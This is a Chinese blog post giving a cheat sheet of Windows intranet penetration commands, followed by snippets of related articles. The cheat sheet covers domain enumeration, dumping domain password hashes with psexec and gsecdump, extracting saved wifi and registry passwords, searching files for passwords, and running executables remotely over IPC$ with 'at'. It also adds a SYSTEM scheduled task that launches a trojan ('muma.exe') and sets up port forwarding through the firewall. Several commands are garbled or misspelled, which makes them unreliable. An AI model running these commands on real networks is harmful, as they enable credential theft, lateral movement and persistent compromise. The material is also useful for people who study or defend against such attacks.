Windows内网渗透命令

最新推荐文章于 2025-06-18 17:29:31 发布
原创 最新推荐文章于 2025-06-18 17:29:31 发布 · 1k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows

一、域常用操作命令

  1. 用户组相关
    • net group /domain:获得所有域用户组列表
    • net group qq_group /domain:显示域中qq_group组的成员等操作(包括添加、删除成员及组本身)
    • net group "domain admins"net group "enterprise admins"等:分别获得域管理员、企业管理员等列表
  2. 用户相关
    • net user /domain:获得所有域用户列表及指定账户详细信息
    • net user someuser /domain:获得指定账户详细信息
    • net user /domain bk bk123:修改域内用户密码(需管理员权限)
  3. 其他信息获取
    • net accounts /domain:获得域密码策略设置
    • nei view /domainnet view /domain:testdomain:查询域及域中计算机列表
    • nltest /domain_trusts:获取域信任信息
    • net config Workstation:查询机器属于哪个域
    • net time /domian:查询主域服务器的时间
    • echo %logonserver%:查看登陆到这台服务器的计算机名
    • net time \192.168.1.1:查询远程共享主机时间
    • net use \IP\ipc$ password /user:username@domain:ipc$ 域内连接
    • net view \http://dc2.backlion.com:查看域控共享情况
    • dir \http://dc2.backlion.com\SYSVOL /s /a > sysvol.txt:列出 sysvol 日志记录
    • xcopy \http://dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c:远程拷贝到本地 sysvol 日志
    • mstsc /admin:远程桌面登录到 console 会话解决 hash 无法抓出问题
    • gpupdate/force:更新域策略
    • psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u:从域服务器密码存储文件导出 hash 值
    • gsecdump -a:获取域登管理员登录过得 hash 值

二、基本内网渗透命令

  1. 网络配置相关
    • ipconfig/allipconfig /releaseipconfig /renew:查看、释放、重新获取 IP 地址
    • ping hostname:显示机器名的 IP
    • netstat -anonetstat -an | find “3389”:查看开放端口及查找特定端口
    • net accounts:查看本地密码策略
    • nbtstat –A ip:netbiso 查询
    • net view:查看机器注释或活动状态机器列表(netbios 未禁用时)
    • echo %PROCESSOR_ARCHITECTURE%:查看系统是 32 还是 64 位
    • set:查看系统环境设置变量
  2. 用户及权限相关
    • whoamiwhoami/all:查询账号所属权限及查看 sid 值
    • net usernet localhroup administrators:查看本地组用户及本机管理员组用户
    • net session:查看当前会话
  3. 系统信息相关
    • systeminfo:查询系统以及补丁信息
    • tasklist /svctaskkill /imtaskkill /pid:查看进程、结束进程
    • wmic qfe get hotfixidwmic qfe list full /format:htable > hotfixes.htmwmic qfe:查看已安装补丁相关信息
  4. 共享及服务相关
    • net sharewmic share get name,path:查看 SMB 指向的路径(共享)
    • wmic nteventlog get path,filename,writeable:查询系统日志文件存储位置
    • net use \IP\ipc$ password /user:username:建立 IPC 会话(工作组模式)
    • net use z: \192.168.1.1:建立映射到本机 Z 盘
    • at \172.16.16.2 13:50 c:\windows\2009.exe:在共享主机上执行
    • net start:查看当前运行的服务
    • wmic service list briefwmic process list briefwmic startup list briefwmic product list brief:查看进程服务、进程、启动程序、安装程序和版本信息
    • wmic startup list full:识别开机启动的程序
    • wmic process where(description="mysqld.exe") >>mysql.log:获取软件安装路径
    • for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan showprofiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %jkey=clear:一键获取 wifi 密码
    • if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell):查看是否支持 posershell
    • qwinsta:查看登录情况
    • schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7:添加计划任务
    • REG query HKCU /v "pwd" /s:获取保存到注册表中的密码

三、内网网络结常用命令

  1. 网络路径相关
    • tracert IP:路由跟踪
    • route print:打印路由表
    • arp -a:列出本网段内所有活跃的IP地址
    • arp -sarp -d:绑定、解绑mac与ip地址
    • nbtscan -r 192.168.16.0/24:扫描整个网络
  2. 防火墙相关
    • netsh firewall show confignetsh firewall show state:查看防火墙策略
  3. 主机扫描相关
    • for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl":批量扫描内网存活主机

四、windows自带端口转发

  1. 配置相关
    • netsh interface ipv6 install:安装IPV6(部分系统必须)
    • netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22:设置端口转发
    • netsh interface portproxy show all:查看转发配置
    • netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22:删除配置
    • netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all:添加防火墙规则允许连接

五、敏感数据和目录

  1. 文件查找相关
    • dir /b/s config.*:查看所在目录所有config.为前缀的文件
    • findstr /si password.xml.ini *.txtfindstr /si login.xml.ini *.txt:查看后缀名文件中含有password、login关键字的文件

六、copy con创建命令

  1. 创建批处理和脚本
    • copy con ftp.bat:创建ftp.bat批处理
    • copy con test.vbs:创建test.vbs脚本

七、dsquery的AD查询工具

  1. 用户及相关信息查询
    • dsquery user domainroot -limit 65535 && net user /domain:列出域内所有用户名
    • dsquery server -domain http://super.com | dsget server -dnsname -site:搜索域内所有域控制器并显示DNS主机名和站点名称
    • dsquery contact:寻找目录中的联系人
    • dsquery subnet:列出域内网段划分
    • query user:查询那些用户在线
    • dsquery group && net group /domain:列出域内分组
    • dsquery ou:列出域内组织单位
    • dsquery server && net time /domain:列出域内域控制器
    • dsquery site -o rdn:搜索域中所有站点的名称
    • dsquery group dc=super,dc=com |more:搜索在DC=SUPER,DC=COM 域中的所有组
    • psloggedon.exe:查询那台主机和用户登录到该主机上
    • netsess.exe:远程主机上无需管理员权限,查询到主机名和用户
    • reg query "HKEY_CURRENT_USER\SOENSION_CLIENT\DEFAULT":获取最近mstsc登录的记录

八、DOS常用快捷命令

  1. 工具调用相关
    • mspaintcalcnotepadtaskmgroskgpedit.mscservices.msccompmgmt.mscdevmgmt.mscwinvermagnifyeventvwrRegeditresmonWMIC BIOS get releasedatemstsc -f:分别调用画图工具、计算器、记事本、任务管理器、屏幕键盘、组策略、本地服务、计算机管理、设备管理器、系统版本查看、放大镜、事件查看器、注册表、资源监视器、查看电脑生产日期、远程连接(全屏)
内网渗透-Windows内网渗透
lza20001103的博客
08-15 2645
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
内网渗透一些命令收集整理
cnbird's blog
05-12 7268
内网渗透一些命令收集整理
99%的人不知道的内网渗透和域渗透的区别和方式,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
06-18 559
内网渗透的攻击目标是内网中的任意主机,而域渗透的攻击目标是域控制器。:攻击者首先需要收集有关目标内网的信息,例如:网络拓扑、操作系统版本、软件版本、安全漏洞等。内网渗透和域渗透是复杂的技术,需要攻击者具备扎实的网络安全知识和实践经验。内网渗透和域渗透都是网络安全领域中的重要概念,它们都涉及到攻击者在内网中获取权限的过程。然而,两者之间也存在一些区别。:攻击者需要找到一个可以进入内网的途径,例如:利用已知漏洞、社会工程、物理攻击等。:攻击者可以使用各种技术来提升自己的权限,例如:利用漏洞、本地提权、后门等。
内网渗透--windows
weixin_44940180的博客
08-18 341
windows基础命令 添加管理员用户,设置密码为123456 net user cly 123456 /add net localgroup administrators cly /add 如果远程桌面连接不上,那么可以添加远程桌面组 net localgroup "Remote Desktop Users" cly /add
Windows内网渗透信息搜集命令总汇
weixin_45995579的博客
06-22 706
windows内网渗透命令
Windows 内网渗透之横向渗透
qq_53742230的博客
07-31 3788
内网渗透之横向渗透
红蓝对抗之Windows内网渗透.pdf
09-20
本文详细介绍了在红蓝对抗场景下,针对Windows内网渗透的常用方法和手段。红蓝对抗是一种模拟真实网络安全攻防的演练方式,旨在通过模拟攻击者(红队)与防守者(蓝队)的对抗,检验和提升组织的网络安全防御能力。...
内网渗透Windows系统提权实战(1)
xinyaoyaotu的博客
01-18 1807
本文的Windows提权实战通过一系列步骤实现权限提升。首先,在已建立webshell但权限不足时,利用中国菜刀检测出有读写执行权限的phpstudy目录,传入cmd.exe并更改调用路径。接着用systeminfo查看系统漏洞补丁,依据未打补丁号从github获取ms09-012exp。利用该工具提权后,创建普通用户并将其加入管理员组,通过脚本开启3389端口,最终实现远程桌面连接目标服务器,完成内核提权。
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
【红蓝对抗之Windows内网渗透】是一种网络安全实践,旨在暴露系统漏洞并提高安全防护能力。在企业环境中,外部防御通常严密,但内部网络的安全状况可能相对较弱,因此攻击者常利用员工电脑、外网服务或WiFi等途径...
内网渗透----windows信息收集整理
浅笑996的博客
04-14 1046
一、基础信息收集 1.信息收集类型 操作系统版本、内核、架构 是否在虚拟化环境中,已安装的程序、补丁 网络配置及连接 防火墙设置 用户信息、历史纪录(浏览器、登陆密码) 共享信息、敏感文件、缓存信息、服务等 2.系统信息 systeminfo 功能:心事有关计算机及其操作系统的详细配置,包括操作系统配置,安全信息,产品ID和硬件属性(如RAM,磁盘空间和网卡) Egg systeminfo ...
Windows 内网渗透常用命令
buffedon的博客
07-08 663
Windows 常用命令内网信息收集常用命令提权常用命令 内网信息收集常用命令 ipconfig /all 查看本机ip,所在域 route print 打印路由信息 net view 查看局域网内其他主机名 arp -a 查看arp缓存 netstat -ano 查看开放端口 netstat -ano | find "3389" 查看3389是否开放
内网渗透windows
qq_63980959的博客
04-05 3541
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
web渗透---windows内网渗透
jklbnm12的博客
09-19 1391
不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。 内网渗透思路 本次内网渗透的思路为:通过信息收集对网站进行分析,通过攻击外网服务器,从而获取外网服务器的权限,然后利用入侵成功的外网服务器作为跳板来攻击内网其他服务器,最后获得敏感数据(系统密码等),看情况安装后门木马或者后门软件,实现长期控制和获得敏感数据的方式。 还有一种内网渗透的思路为:通过社工等方法攻击企业办公网的电脑、办公网无线等,实现控制办公电脑,再用获得的办公网数据。 渗透
内网渗透常见命令收集整理
j448998943的博客
01-07 557
1,执行如下命令,可以获取当前机器是否处在内网中、有几个内网内网段分别是多少、是否是域内网、网关 IP 地址、DNS 指向的 IP 地址等信息 ipconfig /all 2,获取系统和版本信息 systeminfo | findstr /B /I /C:“os name” /C: “OS Version” 3,/B: 在一行开始匹配,/I:不区分大小写 /C:string :使用指定的字符串作为文字搜索字符串 如果是中文操作系统,输入如下命令 systeminfo | findstr /B
windows靶机_【内网渗透Windows下的内网传输技术
weixin_39984403的博客
01-26 454
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~掐指一算,好像已经一个月没更新过了...趁着现在不忙(才不是偷懒)赶紧更新一波~今天给大家分享的内容是Windows内网传输技术:有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。一起来看看吧!Part.1FTPFTP环境部署 首先,ftp支持ASCII码传输、也...
windows内网渗透技巧
weixin_30414245的博客
12-21 254
1、(windows)无扫描器情况下内网存活主机探测: for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl" 2、(windows)查找域中计算机名对应ip: FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo n...
揭秘内网渗透命令大全助你轻松测试安全【内网渗透命令大全】
小司机的奥拓
01-03 846
/创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功。//获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值。//从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来。//创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功。//查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《//获得域密码策略设置,密码长短,错误锁定等信息。
内网渗透——windows认证
战神/calmness的博客
10-01 368
目录 windows密码Hash NTLM hash NET-NTLM hash NTLM 认证 域环境中 Kerberos协议 1.用户登陆 2.请求身份认证 3. 请求服务授权 客户端向TGS发送请求服务授权请求 TGS为Client响应服务授权票据 4.发送服务请求 Client向Service Server发送服务请求 SS响应Client 认证流程中需要关注的点,票据伪造的原理 在域渗透中,横向移动最重要是对windows认证协议的理解 windows密码H.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

打一年工搬一年砖

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值